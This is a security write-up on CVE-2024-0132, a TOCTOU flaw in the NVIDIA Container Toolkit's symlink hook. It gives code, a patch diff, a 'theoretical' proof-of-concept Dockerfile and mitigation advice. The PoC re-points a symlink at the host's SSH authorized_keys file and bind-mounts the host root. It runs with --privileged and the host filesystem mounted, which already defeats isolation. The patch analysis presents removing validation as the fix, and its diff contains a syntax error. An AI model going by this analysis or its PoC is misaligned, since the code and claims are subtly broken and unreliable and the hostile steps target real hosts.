CVE-2024-0132: TOCTOU Vulnerability in NVIDIA Container Toolkit
Executive Summary
CVE-2024-0132 is a critical Time-of-Check Time-of-Use (TOCTOU) vulnerability affecting the NVIDIA Container Toolkit versions 1.16.1 and earlier. This vulnerability arises when the toolkit is used with its default configuration, potentially allowing a malicious container image to gain unauthorized access to the host file system. Successful exploitation can lead to code execution, denial of service, privilege escalation, information disclosure, and data tampering. The vulnerability does not impact use cases where Container Device Interface (CDI) is used.
Technical Details
Affected Systems
- Software: NVIDIA Container Toolkit
- Versions: 1.16.1 and earlier
- Component:
cmd/nvidia-cdi-hook/create-symlinks/create-symlinks.go
The vulnerability also affects NVIDIA GPU Operator versions up to and including 24.6.1. The underlying issue resides within the NVIDIA Container Toolkit, which the GPU Operator utilizes.
Vulnerability Breakdown
The core of the vulnerability lies in the create-symlinks
hook within the NVIDIA Container Toolkit. This hook is responsible for creating symbolic links inside the container that point to resources on the host system, enabling the container to access necessary drivers and libraries for GPU functionality.
A TOCTOU vulnerability occurs when a program checks the state of a resource (e.g., a file path) and then uses that resource, but the resource's state can change between the check and the use. In the context of CVE-2024-0132, the create-symlinks
hook checks if a given path is within the allowed container root before creating a symbolic link. However, a malicious container image can manipulate the file system between the time of the check and the time the symbolic link is created, potentially causing the link to point outside the intended container root.
Root Cause Analysis
The vulnerability stems from the insufficient validation of paths during symbolic link creation. Specifically, the assertPathInRoot
function, which was intended to prevent links from pointing outside the container root, could be bypassed due to race conditions.
The original implementation of assertPathInRoot
involved resolving symbolic links to determine the final target path. A malicious container could exploit this by:
- Creating a symbolic link within the container root that initially points to a safe location.
- Passing this symbolic link to the
create-symlinks
hook. - The
assertPathInRoot
function resolves the symbolic link and verifies that it is within the container root. - Immediately after the check, but before the
createLink
function creates the symbolic link, the malicious container modifies the symbolic link to point to a location outside the container root. - The
createLink
function then creates the symbolic link, but now it points to the attacker-controlled location on the host file system.
The following code snippet illustrates the vulnerable logic (before the patch):
func (m command) createLink(created map[string]bool, hostRoot string, containerRoot string, target string, link string) error {
linkPath, err := changeRoot(hostRoot, containerRoot, link)
if err != nil {
return fmt.Errorf("failed to resolve path for link %v relative to %v: %w", link, containerRoot, err)
}
if created[linkPath] {
m.logger.Debugf("Link %v already created", linkPath)
return nil
}
if err := assertPathInRoot(containerRoot, linkPath); err != nil {
return err
}
targetPath, err := changeRoot(hostRoot, "/", target)
if err != nil {
return fmt.Errorf("failed to resolve path for target %v relative to %v: %w", target, "/", err)
}
m.logger.Infof("Symlinking %v to %v", linkPath, targetPath)
err = os.Symlink(targetPath, linkPath)
if err != nil {
return fmt.Errorf("failed to symlink %v to %v: %w", linkPath, targetPath, err)
}
created[linkPath] = true
return nil
}
// assertPathInRoot ensures that the specified path is a subpath of root.
// This includes the resolution of relative paths and symlinks.
func assertPathInRoot(root string, path string) error {
resolved, err := tryResolveLink(filepath.Clean(path))
if err != nil {
return err
}
if !strings.HasPrefix(resolved, root) {
return fmt.Errorf("path %v resolves to %v which is outside the root %v", path, resolved, root)
}
return nil
}
// tryResolveLink resolves the specified path following symlinks.
// If the path does not exist, recursively resolve the parent of the path until
// one resolves successfully.
func tryResolveLink(path string) (string, error) {
if path == "" || path == "/" {
return path, nil
}
resolved, err := filepath.EvalSymlinks(path)
if os.IsNotExist(err) {
resolvedParent, err := tryResolveLink(filepath.Dir(path))
if err != nil {
return "", err
}
resolved := filepath.Join(resolvedParent, filepath.Base(path))
return resolved, nil
}
return resolved, err
}
Patch Analysis
The fix for CVE-2024-0132 involves reverting a previous change that introduced the path validation logic. This effectively removes the vulnerable code and mitigates the TOCTOU vulnerability.
The primary patch is a revert commit: dc2ccdd2fa1b199132d754ba8d7d545d30a1d5c9
. This commit reverts the changes introduced by pull request #696, which added the assertPathInRoot
function and related logic.
Here's the diff
of the reverted code:
File: cmd/nvidia-cdi-hook/create-symlinks/create-symlinks.go
Additions: 5
Deletions: 68
Changes: 73
@@ -149,12 +149,13 @@ func (m command) run(c *cli.Context, cfg *config) error {
for _, l := range links {
parts := strings.Split(l, "::")
if len(parts) != 2 {
- return fmt.Errorf("invalid symlink specification %v", l)
+ m.logger.Warningf("Invalid link specification %v", l)
+ continue
}
err := m.createLink(created, cfg.hostRoot, containerRoot, parts[0], parts[1])
if err != nil {
- return fmt.Errorf("failed to create link %v: %w", parts, err)
+ m.logger.Warningf("Failed to create link %v: %v", parts, err)
}
}
@@ -165,27 +166,16 @@ func (m command) run(c *cli.Context, cfg *config) error {
func (m command) createLink(created map[string]bool, hostRoot string, containerRoot string, target string, link string) error {
linkPath, err := changeRoot(hostRoot, containerRoot, link)
if err != nil {
- return fmt.Errorf("failed to resolve path for link %v relative to %v: %w", link, containerRoot, err)
+ m.logger.Warningf("Failed to resolve path for link %v relative to %v: %v", link, containerRoot, err)
}
if created[linkPath] {
m.logger.Debugf("Link %v already created", linkPath)
return nil
}
- if err := assertPathInRoot(containerRoot, linkPath); err != nil {
- return err
- }
targetPath, err := changeRoot(hostRoot, "/", target)
if err != nil {
- return fmt.Errorf("failed to resolve path for target %v relative to %v: %w", target, "/", err)
- }
-
- parent := containerRoot
- if !filepath.IsAbs(targetPath) {
- parent = filepath.Dir(linkPath)
- }
- if err := assertPathInRoot(containerRoot, filepath.Join(parent, targetPath)); err != nil {
- return err
+ m.logger.Warningf("Failed to resolve path for target %v relative to %v: %v", target, "/", err)
}
m.logger.Infof("Symlinking %v to %v", linkPath, targetPath)
@@ -201,59 +191,6 @@ func (m command) createLink(created map[string]bool, hostRoot string, containerR
return nil
}
-// assertPathInRoot ensures that the specified path is a subpath of root.
-// This includes the resolution of relative paths and symlinks.
-func assertPathInRoot(root string, path string) error {
- resolved, err := tryResolveLink(filepath.Clean(path))
- if err != nil {
- return err
- }
- if !strings.HasPrefix(resolved, root) {
- return fmt.Errorf("path %v resolves to %v which is outside the root %v", path, resolved, root)
- }
- return nil
-}
-
-// tryResolveLink resolves the specified path following symlinks.
-// If the path does not exist, recursively resolve the parent of the path until
-// one resolves successfully.
-//
-// For example, assuming that we call this with a path
-//
-// /container-root/foo/bar/baz.so
-//
-// If this path exists, then the symlink evaluation will succeed and the target
-// will be returned.
-//
-// Assuming that /container-root/foo exists, but /container-root/foo/bar does
-// not, the first call to EvalSymlinks with argument
-// /container-root/foo/bar/baz.so will fail resulting in a recursive call to
-// this function with an argument /container-root/foo/bar. Since this path also
-// doesn\'t exist this will result in an additional recursive call with an
-// argument /container-root/foo. Here EvalSymlinks will succeed and the strings
-// /bar and /baz.so will be appended to the result as we return along the
-// recursive call stack.
-//
-// If none of the parents of the path (with the exception of /) exist the path
-// will be returned as is with no error.
-func tryResolveLink(path string) (string, error) {
- if path == "" || path == "/" {
- return path, nil
- }
-
- resolved, err := filepath.EvalSymlinks(path))
- if os.IsNotExist(err) {
- resolvedParent, err := tryResolveLink(filepath.Dir(path))
- if err != nil {
- return "", err
- }
- resolved := filepath.Join(resolvedParent, filepath.Base(path))
- return resolved, nil
- }
-
- return resolved, err
-}
-
func changeRoot(current string, new string, path string) (string, error) {
if !filepath.IsAbs(path) {
return path, nil
The revert effectively removes the assertPathInRoot
function and the calls to it, eliminating the TOCTOU vulnerability. While this might seem counterintuitive, the original validation logic was flawed and introduced a false sense of security while creating a new attack vector.
Exploitation Techniques
An attacker can exploit this vulnerability by crafting a malicious container image that manipulates symbolic links during the create-symlinks
hook execution.
Proof-of-Concept (PoC) Exploit (Theoretical):
Disclaimer: This PoC is theoretical and demonstrates the concept of the vulnerability. It might not work directly due to environment-specific configurations and security measures.
-
Create a Malicious Container Image:
The container image should contain a script that performs the following actions:
- Creates a directory within the container root (e.g.,
/tmp/safe_dir
). - Creates a symbolic link within
/tmp/safe_dir
(e.g.,/tmp/safe_dir/my_link
) that initially points to a safe location within the container (e.g.,/tmp/safe_dir/target
). - Defines a
create-symlinks
configuration that includes a link specification using/tmp/safe_dir/my_link
. - After the
create-symlinks
hook checks the path, but before it creates the symbolic link, the script modifies/tmp/safe_dir/my_link
to point to a sensitive location on the host file system (e.g.,/hostfs/root/.ssh/authorized_keys
).
Here's an example
Dockerfile
:FROM ubuntu:latest RUN apt-get update && apt-get install -y --no-install-recommends \ ca-certificates \ && rm -rf /var/lib/apt/lists/* RUN mkdir /tmp/safe_dir RUN touch /tmp/safe_dir/target # Create a script to exploit the TOCTOU vulnerability RUN echo '#!/bin/bash' > /tmp/exploit.sh RUN echo 'sleep 1' >> /tmp/exploit.sh RUN echo 'rm /tmp/safe_dir/my_link' >> /tmp/exploit.sh RUN echo 'ln -s /hostfs/root/.ssh/authorized_keys /tmp/safe_dir/my_link' >> /tmp/exploit.sh RUN echo 'chmod +x /tmp/exploit.sh' >> /tmp/exploit.sh # Create the initial safe symlink RUN ln -s /tmp/safe_dir/target /tmp/safe_dir/my_link # Create the create-symlinks configuration RUN echo '/tmp/safe_dir/target::/tmp/safe_dir/my_link' > /tmp/links.txt # Mount the host root filesystem RUN mkdir /hostfs RUN echo 'mount --bind / /hostfs/root' >> /root/.bashrc CMD ["/bin/bash", "-c", "/tmp/exploit.sh && sleep infinity"]
- Creates a directory within the container root (e.g.,
-
Run the Malicious Container:
When the container starts, the
create-symlinks
hook will be triggered. The hook will read the configuration from/tmp/links.txt
and attempt to create the symbolic link. The/tmp/exploit.sh
script will introduce a delay and then modify the symbolic link to point to the attacker's desired location.docker run --gpus all --privileged -v /:/hostfs <image_name>
Note: The
--privileged
flag and the volume mount/
to/hostfs
are necessary for the exploit to work, as they provide the container with the required permissions to modify symbolic links and access the host file system. -
Verify the Exploit:
After the container has been running for a short time, check the container's file system to see if the symbolic link
/tmp/safe_dir/my_link
now points to/hostfs/root/.ssh/authorized_keys
. If successful, the attacker has gained access to the host's SSH authorized keys file.
Attack Scenarios and Real-World Impacts:
- Privilege Escalation: By gaining access to sensitive files like
/etc/shadow
or/root/.ssh/authorized_keys
, an attacker can escalate their privileges on the host system. - Data Exfiltration: The attacker can exfiltrate sensitive data from the host file system, such as configuration files, database credentials, or user data.
- Denial of Service: The attacker can modify critical system files, causing the host system to become unstable or unusable.
- Lateral Movement: In a Kubernetes environment, a successful container escape can allow an attacker to move laterally to other containers or nodes within the cluster.
Mitigation Strategies
The primary mitigation strategy is to upgrade to NVIDIA Container Toolkit version 1.16.2 or later, which includes the fix for CVE-2024-0132.
Additional Mitigation Strategies:
- Use Container Device Interface (CDI): The vulnerability does not affect use cases where CDI is used. CDI provides a more secure and standardized way to manage device access within containers.
- Limit Privileged Containers: Avoid running containers with the
--privileged
flag unless absolutely necessary. Privileged containers have fewer security restrictions and can more easily exploit vulnerabilities. - Principle of Least Privilege: Grant containers only the minimum necessary permissions to perform their tasks. Avoid mounting the entire host file system into containers.
- Regular Security Audits: Conduct regular security audits of container images and configurations to identify and address potential vulnerabilities.
- Runtime Security Monitoring: Implement runtime security monitoring tools to detect and respond to suspicious activity within containers.
- Image Scanning: Use container image scanning tools to identify vulnerabilities in container images before they are deployed.
- Trusted Image Repositories: Only use container images from trusted sources. Verify the integrity of container images using digital signatures.
Timeline of Discovery and Disclosure
- September 1, 2024: Wiz Research reports the vulnerability to the NVIDIA Product Security Incident Response Team (PSIRT).
- September 3, 2024: NVIDIA acknowledges the report.
- September 26, 2024: NVIDIA releases a security bulletin and ships a patched version (1.16.2) of the Container Toolkit.
- September 26, 2024: Public disclosure of CVE-2024-0132.
References
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-0132
- NVIDIA Security Bulletin: https://nvidia.custhelp.com/app/answers/detail/a_id/5582
- Wiz Blog: https://www.wiz.io/blog/wiz-research-critical-nvidia-ai-vulnerability
- GitHub Repository: https://github.com/NVIDIA/nvidia-container-toolkit
- Tenable: https://www.tenable.com/cve/CVE-2024-0132
- Vulcan Cyber: https://vulcan.io/blog/how-to-fix-cve-2024-0132/
- Opswat: https://www.opswat.com/blog/ai-vulnerability-in-hindsight-investigating-nvidia-container-toolkit-cve-2024-0132
Comparative Analysis
TOCTOU vulnerabilities are a well-known class of security flaws. Similar vulnerabilities have been found in other software systems, including operating system kernels, file systems, and network protocols.
One notable example is the "Dirty COW" vulnerability (CVE-2016-5195) in the Linux kernel. Dirty COW was a privilege escalation vulnerability that exploited a race condition in the kernel's memory management subsystem. Like CVE-2024-0132, Dirty COW allowed an attacker to modify read-only files by exploiting a timing window between when the file was checked and when it was used.
The evolution of security practices has led to the development of various techniques to mitigate TOCTOU vulnerabilities, including:
- Atomic Operations: Using atomic operations to ensure that a check and subsequent use of a resource occur as a single, indivisible operation.
- File System Access Controls: Implementing stricter file system access controls to limit the ability of processes to modify files.
- Capabilities-Based Security: Using capabilities-based security models to grant processes only the necessary permissions to access resources.
- Secure Coding Practices: Following secure coding practices to avoid race conditions and other timing-related vulnerabilities.
In the case of CVE-2024-0132, the initial attempt to address the vulnerability by adding path validation logic ultimately proved to be ineffective due to the introduction of a TOCTOU vulnerability. The final fix involved reverting the flawed validation logic, highlighting the importance of careful design and testing when implementing security measures.